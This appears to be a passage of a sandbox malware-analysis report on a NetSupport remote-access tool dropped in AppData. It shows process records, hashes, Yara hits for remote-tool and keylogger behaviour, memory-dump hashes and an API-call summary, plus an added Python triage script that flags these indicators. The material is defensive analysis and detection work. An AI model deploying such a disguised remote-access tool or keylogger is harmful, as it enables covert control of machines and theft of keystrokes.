                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 27%, ReversingLabs
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:13
                                                                                Start time:10:34:02
                                                                                Start date:10/09/2024
                                                                                Path:C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
                                                                                Imagebase:0x3a0000
                                                                                File size:103'824 bytes
                                                                                MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2436230246.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000000.2434122140.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2437590353.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:16
                                                                                Start time:10:34:05
                                                                                Start date:10/09/2024
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff7403e0000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:18
                                                                                Start time:10:34:10
                                                                                Start date:10/09/2024
                                                                                Path:C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
                                                                                Imagebase:0x3a0000
                                                                                File size:103'824 bytes
                                                                                MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.2518264391.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.2516794939.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000000.2515693268.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.2518228905.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.2518228905.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:true

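The process list above is the operational core of this report: the same client32.exe (MD5 C4F1B50E3111D29774F7525039FF7086) is started three times from a user-writable %APPDATA% directory, every instance carries the JoeSecurity_NetSupport and JoeSecurity_Keylogger_Generic memory matches, and the only elevated process in the range is the legitimate BITS svchost. Note the caveat that client32.exe is the real NetSupport Manager client binary, so the file name alone is not an indicator; what matters is the hash, the AppData\Roaming install path, and the in-memory Yara hits. As an added triage example, not code from the Joe Sandbox report, the following Python parses records in the report's `Key:Value` layout and flags those three signals. The sample records are transcribed (abridged) from the entries above; the function and constant names are assumptions for the example.

```python
"""Triage Joe Sandbox process records for the NetSupport RAT signals seen in this report."""
import re
from dataclasses import dataclass

# Indicators transcribed from this report's process list.
DROPPED_CLIENT_MD5 = {"C4F1B50E3111D29774F7525039FF7086"}
# A NetSupport client started from a per-user profile path rather than a Program Files install.
USER_PROFILE_PATH = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)

# Constructed sample: abridged copies of Target IDs 11, 13 and 16 from the report above.
SAMPLE_RECORDS = r"""
Target ID:11
Start time:10:33:50
Path:C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
Commandline:"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
MD5 hash:C4F1B50E3111D29774F7525039FF7086
Has administrator privileges:false
Yara matches:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Author: Joe Security
Has exited:false

Target ID:13
Start time:10:34:02
Path:C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
MD5 hash:C4F1B50E3111D29774F7525039FF7086
Has administrator privileges:false
Yara matches:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2436230246.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
Has exited:true

Target ID:16
Start time:10:34:05
Path:C:\Windows\System32\svchost.exe
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has administrator privileges:true
Has exited:false
"""


@dataclass
class ProcessRecord:
    fields: dict          # "Key" -> "Value" for the plain Key:Value lines
    yara_rules: list      # rule names collected from the "• Rule: ..." bullets


def parse_records(text: str) -> list:
    """Split the report text into blank-line separated process records."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields, rules = {}, []
        for raw in block.splitlines():
            line = raw.strip()
            if not line:
                continue
            if line.startswith("•"):
                # Bullet lines belong to the preceding "Yara matches:" field.
                match = re.search(r"Rule:\s*([A-Za-z0-9_]+)", line)
                if match:
                    rules.append(match.group(1))
                continue
            # Split on the first colon only: "Start time:10:33:50" keeps its value intact.
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        records.append(ProcessRecord(fields, rules))
    return records


def triage(record: ProcessRecord) -> list:
    """Return the reasons (if any) this process should be treated as the NetSupport RAT."""
    reasons = []
    path = record.fields.get("Path", "")
    image = path.rsplit("\\", 1)[-1].lower()
    md5 = record.fields.get("MD5 hash", "").upper()
    if md5 in DROPPED_CLIENT_MD5:
        reasons.append(f"MD5 {md5} matches the client32.exe dropped in this report")
    # client32.exe is a legitimate NetSupport binary; the profile-path install is the signal.
    if image == "client32.exe" and USER_PROFILE_PATH.search(path):
        reasons.append("NetSupport client32.exe running from a user-writable AppData path")
    # The same rule fires on several memory regions; report each rule once.
    for rule in sorted(set(record.yara_rules)):
        reasons.append(f"Yara match in process memory: {rule}")
    return reasons


def flagged_targets(text: str) -> dict:
    """Map Target ID -> triage reasons for every record that raised at least one."""
    hits = {}
    for record in parse_records(text):
        reasons = triage(record)
        if reasons:
            hits[record.fields.get("Target ID", "?")] = reasons
    return hits


if __name__ == "__main__":
    for target, reasons in flagged_targets(SAMPLE_RECORDS).items():
        print(f"Target {target}:")
        for reason in reasons:
            print(f"  - {reason}")
```

Run against the report's own records, the script flags Target IDs 11 and 13 and leaves the BITS svchost (Target ID 16) alone, which is the split a responder wants: the elevated process in this range is a Windows service, and the malicious activity is all in the unprivileged user context.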
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 7[C$hL"4$hL"4$hL"4$hL"4
                                                                                  • API String ID: 0-3500843204
                                                                                  • Opcode ID: 24e64ab17e623dc52e447c03d251c971e135bed4b94a90d25b65093b92be3572
                                                                                  • Instruction ID: 0008161fb43a3b2e10d9c3554de2fcb1eb598e564dc5631af4baafe88336072e
                                                                                  • Opcode Fuzzy Hash: 24e64ab17e623dc52e447c03d251c971e135bed4b94a90d25b65093b92be3572
                                                                                  • Instruction Fuzzy Hash: 04A13D21F1E94A0FEBA5AB2C44753B967D1EF89314F8501BAE14ED72CADD3CAC069341
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2360433888.00007FFD340A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd340a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x7[C
                                                                                  • API String ID: 0-410071247
                                                                                  • Opcode ID: 0cd97b4c00bdb1f7839e7dc3c46606f67abcd374c1b28a3053f6ec3e5c561884
                                                                                  • Instruction ID: d97ff0b29ac8f229628910d92953322f43929bc9cabe18109cabd54e9d1cdbf3
                                                                                  • Opcode Fuzzy Hash: 0cd97b4c00bdb1f7839e7dc3c46606f67abcd374c1b28a3053f6ec3e5c561884
                                                                                  • Instruction Fuzzy Hash: D6E11326B1EB860FE7E69B2848A52B43BE1EF57210B1901FFD18DC71A3D91DAC06D351
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: dc1ca176533cbd18281bccd219e0a95470b0a5d679ef9622c1e6f86f3ca19dd1
                                                                                  • Instruction ID: a1056debdc1eb9fe6221e5655a72bacc9d600b84c95994fcac5d5c8f2b9412ab
                                                                                  • Opcode Fuzzy Hash: dc1ca176533cbd18281bccd219e0a95470b0a5d679ef9622c1e6f86f3ca19dd1
                                                                                  • Instruction Fuzzy Hash: EC917C3070DA5C4FD765EB2C9859ABA7BD1EF89320F0402BBF48DC7266C929DC468381
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: hL"4
                                                                                  • API String ID: 0-542164673
                                                                                  • Opcode ID: 61603365589deadebdb70f2642c0ba20a51dfeae45776647129fc9787cef318e
                                                                                  • Instruction ID: ef9d0c7ed6259e9c4f9ae2c626f7296d808a23e3bc9fb8280f5fff9d9187df16
                                                                                  • Opcode Fuzzy Hash: 61603365589deadebdb70f2642c0ba20a51dfeae45776647129fc9787cef318e
                                                                                  • Instruction Fuzzy Hash: 6041B131B0991A4BEFA5EA1C94293BD33E1EF99350F90033AE50EE32D9DE396C014385
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: [.
                                                                                  • API String ID: 0-1638407628
                                                                                  • Opcode ID: 4873bc8f0ec0b003e1ea67f23b3614b3d37b2f7fb9d9ee8a57da0270b78631b0
                                                                                  • Instruction ID: 3cf267745af5ca8bfe85d475cc30b8f00b40a3ce979c32503f9c74134bbcb7c7
                                                                                  • Opcode Fuzzy Hash: 4873bc8f0ec0b003e1ea67f23b3614b3d37b2f7fb9d9ee8a57da0270b78631b0
                                                                                  • Instruction Fuzzy Hash: F741CF20B0D90A4FEFA4F76C8169AB933D1EF58310B950679E14ED329ADD38FC829741
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x6[C
                                                                                  • API String ID: 0-431184632
                                                                                  • Opcode ID: 7205aba2e5ce8218236d157decf6bc4a9dc67c39dfa895254a50b29c75c731a8
                                                                                  • Instruction ID: a74c5504a16f87552448de4e2c63fce3394f82a548ea085b0a5e6cb5c8b8f1ee
                                                                                  • Opcode Fuzzy Hash: 7205aba2e5ce8218236d157decf6bc4a9dc67c39dfa895254a50b29c75c731a8
                                                                                  • Instruction Fuzzy Hash: 1C41EF30A0EA4A4FEB95EB2C94293B977E1EF89310F80037AD50DE3296DE3958558381
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: h`"4
                                                                                  • API String ID: 0-285702469
                                                                                  • Opcode ID: aad683f250146ec99dcf6ef423d786768c58203e67397a9b393c62d6f5e68eb6
                                                                                  • Instruction ID: 494b23a4a83e92c3cabdeffba5a5a949bba1e342a266ba1c34ae10792d9f1dcc
                                                                                  • Opcode Fuzzy Hash: aad683f250146ec99dcf6ef423d786768c58203e67397a9b393c62d6f5e68eb6
                                                                                  • Instruction Fuzzy Hash: FF01B572F0C6090BD75C594C65172BC73C1FB89620F84023FE58FE3385DE25A803468A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: h`"4
                                                                                  • API String ID: 0-285702469
                                                                                  • Opcode ID: b1b7cb0b5ccc1f66dc2ea9e508b3c691b7d6e877898fe88ed50297ac70190c4d
                                                                                  • Instruction ID: edbfa92c611be4c90660a27828b35d88bf44b6a1615ef4ea7f4e999530140c8a
                                                                                  • Opcode Fuzzy Hash: b1b7cb0b5ccc1f66dc2ea9e508b3c691b7d6e877898fe88ed50297ac70190c4d
                                                                                  • Instruction Fuzzy Hash: 44017572F0C6194BD758594C65171BD73C1FB89620F84133FE58FE2285DE25A8135686
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: h`"4
                                                                                  • API String ID: 0-285702469
                                                                                  • Opcode ID: 709207335c66fb80e5fb5e66ef887bc01e56db5056bf25bf3d7fd91dc1766016
                                                                                  • Instruction ID: 40958451afc9c35b3d3f985e25cc638ba24e07e0c595744bc9a5269a55533a11
                                                                                  • Opcode Fuzzy Hash: 709207335c66fb80e5fb5e66ef887bc01e56db5056bf25bf3d7fd91dc1766016
                                                                                  • Instruction Fuzzy Hash: E50171B2F0C6190B9758994C68172B873C1FB89620F44123FE69EE2385DE25A813568A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 04585643190ffee0632b61006c946e4286f82ebed0aef4aa1b329f7bde492919
                                                                                  • Instruction ID: efa629e8d0775701ed1b6cfa0a75aa6d1152c1a7e81bf77c5107ed47dabc814e
                                                                                  • Opcode Fuzzy Hash: 04585643190ffee0632b61006c946e4286f82ebed0aef4aa1b329f7bde492919
                                                                                  • Instruction Fuzzy Hash: 87223A34608A4D8FDFD8EF5CC898AA977E1FF68301B0501A9E95ED72A5DA35EC41CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2360433888.00007FFD340A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd340a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7054efda85db83b4cbdaf5465e0d1bc4ce7f9f0c9610903b0552bc3f66a160d7
                                                                                  • Instruction ID: e2999d657612ca5bf9fe6c427f0bbb6895395d750529a5ac19ebf71cc058b7af
                                                                                  • Opcode Fuzzy Hash: 7054efda85db83b4cbdaf5465e0d1bc4ce7f9f0c9610903b0552bc3f66a160d7
                                                                                  • Instruction Fuzzy Hash: 42D12772B0EB8A0FE7E5DB7C88A55B97BE0EF56210B0800BED94DC7192DA2D9C05D741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 28074640c03247b09a50a5792e8dfe35931450c3be60a8c58b80ac8331fd6662
                                                                                  • Instruction ID: 899de7641f7706c2deaf0b1d264b9e1e9284c416883fe8736335263f7a4664d4
                                                                                  • Opcode Fuzzy Hash: 28074640c03247b09a50a5792e8dfe35931450c3be60a8c58b80ac8331fd6662
                                                                                  • Instruction Fuzzy Hash: FE31E412E0E6D20FEBA2A72C147D1A83FE09F16210B4A01FAD69CDB1E7D91D5C4A9356
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @7[C$H7[C$P7[C$X7[C$`7[C$h7[C$p7[C$p7[C$x6[C
                                                                                  • API String ID: 0-357289539
                                                                                  • Opcode ID: 3f82ca2618cc0dd39eaf2a6fd2ab516b398f806acd84edf0951dd5c1234fba12
                                                                                  • Instruction ID: 5212044d8705fd0505b18ed06fd577efb77b72e256f75b3fc9253e7e49d3ab76
                                                                                  • Opcode Fuzzy Hash: 3f82ca2618cc0dd39eaf2a6fd2ab516b398f806acd84edf0951dd5c1234fba12
                                                                                  • Instruction Fuzzy Hash: 4BD14430B0D64A0FE759AB7894262B977D5EF86320F1542BDD58EC72A7ED3DAC428340

Execution Graph

Execution Coverage: 6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 15%
Total number of Nodes: 2000
Total number of Limit Nodes: 78

[Execution graph: the interactive node-and-edge rendering is not reproduced here. The flattened graph text lists each node as a decimal id, an address and its labels, and each edge as id->id. The nodes fall in two mapped regions (addresses 0x1101xxxx-0x1117xxxx and 0x6fa1xxxx) and carry the following API names: registry (RegOpenKeyExA, RegQueryValueExA, RegQueryInfoKeyA, RegEnumValueA, RegCreateKeyExA, RegCloseKey); loader and process (LoadLibraryA, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetModuleFileNameA, GetCommandLineA, GetCurrentProcess, GetTokenInformation, ExitProcess, TerminateProcess, CloseHandle); error and debug handling (IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RaiseException, SetErrorMode, GetLastError, SetLastError, OutputDebugStringA); synchronisation and threading (WaitForSingleObject, WaitForMultipleObjects, SetEvent, ResetEvent, Sleep, GetTickCount, GetCurrentThreadId, InitializeCriticalSection, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InterlockedExchange, InterlockedDecrement, TlsGetValue, TlsSetValue, EncodePointer, DecodePointer); heap (HeapCreate, HeapFree, RtlAllocateHeap); COM (CoInitialize, CoUninitialize, plus the report's _GetRawWMIStringW label); window and GDI (CreateWindowExA, SetClassLongA, GetSystemMetrics, GetStockObject, GetObjectA, wsprintfA, wvsprintfA); and locale and string conversion (GetACP, GetLocaleInfoA, GetLocaleInfoW, GetUserDefaultLCID, EnumSystemLocalesA, IsValidCodePage, IsValidLocale, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte). Many nodes are labelled with MSVC CRT internals (__CRT_INIT@12, ___security_init_cookie, __getptd, __setlocale_nolock, std::locale::facet::_Facet_Register). In particular, the IsDebuggerPresent -> SetUnhandledExceptionFilter -> UnhandledExceptionFilter -> GetCurrentProcess/TerminateProcess chains are labelled __call_reportfault and __invoke_watson, which are the CRT's fatal-error reporting helpers, so these IsDebuggerPresent hits should be weighed as runtime boilerplate rather than, on their own, as evidence of deliberate anti-debugging.]
87793->87786 87793->87792 87805 11061649 std::ios_base::_Tidy 87793->87805 87829 11081e70 87793->87829 87796 11146a90 268 API calls 87796->87804 87799 1106151f 87840 1105ef20 265 API calls std::locale::facet::_Facet_Register 87799->87840 87801 11081d30 IsDBCSLeadByte 87801->87804 87802 11061532 87841 1105fdc0 85 API calls _TranslateName 87802->87841 87804->87773 87804->87790 87804->87796 87804->87801 87804->87805 87806 11081e70 86 API calls 87804->87806 87805->87756 87806->87804 87808 1105ee10 68 API calls 87807->87808 87809 110611a3 87808->87809 87810 110608e0 67 API calls 87809->87810 87811 110611c2 std::ios_base::_Tidy 87810->87811 87811->87755 87813 1105ee21 LeaveCriticalSection 87812->87813 87814 1105ee2b 87812->87814 87813->87814 87815 1105ee3f 87814->87815 87816 11163aa5 _free 66 API calls 87814->87816 87817 1105ee85 87815->87817 87818 1105ee49 EnterCriticalSection 87815->87818 87816->87815 87817->87767 87818->87767 87819->87768 87820->87770 87822 110611ee 87821->87822 87823 11061208 87821->87823 87843 110608e0 87822->87843 87823->87804 87839 11145bc0 268 API calls 87823->87839 87825 11061200 87851 110610f0 87825->87851 87830 11081e7d 87829->87830 87831 11081e82 87829->87831 87892 11081c50 IsDBCSLeadByte 87830->87892 87833 11081e8b 87831->87833 87834 11081e9f 87831->87834 87893 1116558e 85 API calls 3 library calls 87833->87893 87835 11081f03 87834->87835 87838 11166654 85 API calls std::locale::facet::_Facet_Register 87834->87838 87835->87793 87837 11081e98 87837->87793 87838->87834 87839->87799 87840->87802 87841->87804 87844 110608f4 87843->87844 87850 1106092c 87843->87850 87845 110608f8 87844->87845 87844->87850 87854 110606d0 87845->87854 87846 11060992 87846->87825 87850->87846 87859 11060470 67 API calls 2 library calls 87850->87859 87859->87850 87892->87831 87893->87837 87894->87371 87896 11124fd1 InitializeCriticalSection 87895->87896 87898 11124ffe GetCurrentThreadId 87896->87898 87900 11125035 87898->87900 87901 1112503c 87898->87901 87985 
1110fff0 InterlockedIncrement 87900->87985 87943 11160b10 InterlockedIncrement 87901->87943 87941->87380 87944 11160b27 87943->87944 87945 11160b22 87943->87945 87947 11160b4c SelectPalette SelectPalette 87944->87947 87948 11160b38 87944->87948 88018 11160a60 271 API calls std::locale::facet::_Facet_Register 87945->88018 88020 11160750 265 API calls 87947->88020 88019 11029a70 265 API calls 2 library calls 87948->88019 87952 11160b73 88021 11160750 265 API calls 87952->88021 87954 11160b80 87955 11160b93 87954->87955 87956 11160c4e 87954->87956 88022 111606e0 265 API calls 2 library calls 87955->88022 88033 11160750 265 API calls 87956->88033 87959 11160b9e 87960 11160c5b 87985->87901 88018->87944 88020->87952 88021->87954 88022->87959 88033->87960 89053->87430 89054->87436 89055 11116880 89073 11145ef0 89055->89073 89058 111168c5 89059 111168a8 89058->89059 89060 111168d4 CoInitialize CoCreateInstance 89058->89060 89061 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89059->89061 89063 11116904 LoadLibraryA 89060->89063 89072 111168f9 89060->89072 89064 111168b6 89061->89064 89062 11145c70 std::locale::facet::_Facet_Register 90 API calls 89062->89058 89065 11116920 GetProcAddress 89063->89065 89063->89072 89066 11116930 SHGetSettings 89065->89066 89067 11116944 FreeLibrary 89065->89067 89066->89067 89067->89072 89068 111169e1 CoUninitialize 89069 111169e7 89068->89069 89070 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89069->89070 89071 111169f6 89070->89071 89072->89068 89072->89069 89074 11145c70 std::locale::facet::_Facet_Register 90 API calls 89073->89074 89075 1111689e 89074->89075 89075->89058 89075->89059 89075->89062 89076 1102ebd0 89077 1102ec13 89076->89077 89078 111101b0 std::locale::facet::_Facet_Register 265 API calls 89077->89078 89079 1102ec1a 89078->89079 89081 1102ec3a 89079->89081 90137 11143630 89079->90137 89082 11143780 86 API calls 89081->89082 89083 1102ec64 89082->89083 89084 1102ec91 89083->89084 89085 
11081e70 86 API calls 89083->89085 89087 11143780 86 API calls 89084->89087 89086 1102ec76 89085->89086 89088 11081e70 86 API calls 89086->89088 89089 1102ecba 89087->89089 89088->89084 89090 11163ca7 std::locale::facet::_Facet_Register 79 API calls 89089->89090 89094 1102ecc7 89089->89094 89090->89094 89091 1102ecf6 89092 1102ed68 89091->89092 89093 1102ed4f GetSystemMetrics 89091->89093 89098 1102ed82 CreateEventA 89092->89098 89093->89092 89095 1102ed5e 89093->89095 89094->89091 89096 11145c70 std::locale::facet::_Facet_Register 90 API calls 89094->89096 89097 11147060 std::locale::facet::_Facet_Register 21 API calls 89095->89097 89096->89091 89097->89092 89099 1102ed95 89098->89099 89100 1102eda9 89098->89100 90145 11029a70 265 API calls 2 library calls 89099->90145 89101 111101b0 std::locale::facet::_Facet_Register 265 API calls 89100->89101 89103 1102edb0 89101->89103 89104 1102edd0 89103->89104 89105 11110de0 426 API calls 89103->89105 89106 111101b0 std::locale::facet::_Facet_Register 265 API calls 89104->89106 89105->89104 89107 1102ede4 89106->89107 89108 11110de0 426 API calls 89107->89108 89109 1102ee04 89107->89109 89108->89109 89110 111101b0 std::locale::facet::_Facet_Register 265 API calls 89109->89110 89111 1102ee83 89110->89111 89112 1102eeb3 89111->89112 89113 11061aa0 301 API calls 89111->89113 89114 111101b0 std::locale::facet::_Facet_Register 265 API calls 89112->89114 89113->89112 89115 1102eecd 89114->89115 89116 1102eef2 FindWindowA 89115->89116 89118 11061710 293 API calls 89115->89118 89119 1102f032 89116->89119 89120 1102ef2b 89116->89120 89118->89116 89121 11061ef0 268 API calls 89119->89121 89120->89119 89123 1102ef43 GetWindowThreadProcessId 89120->89123 89122 1102f044 89121->89122 89124 11061ef0 268 API calls 89122->89124 89125 11147060 std::locale::facet::_Facet_Register 21 API calls 89123->89125 89126 1102f050 89124->89126 89127 1102ef60 OpenProcess 89125->89127 89128 11061ef0 268 API calls 89126->89128 89127->89119 89129 1102ef7d 
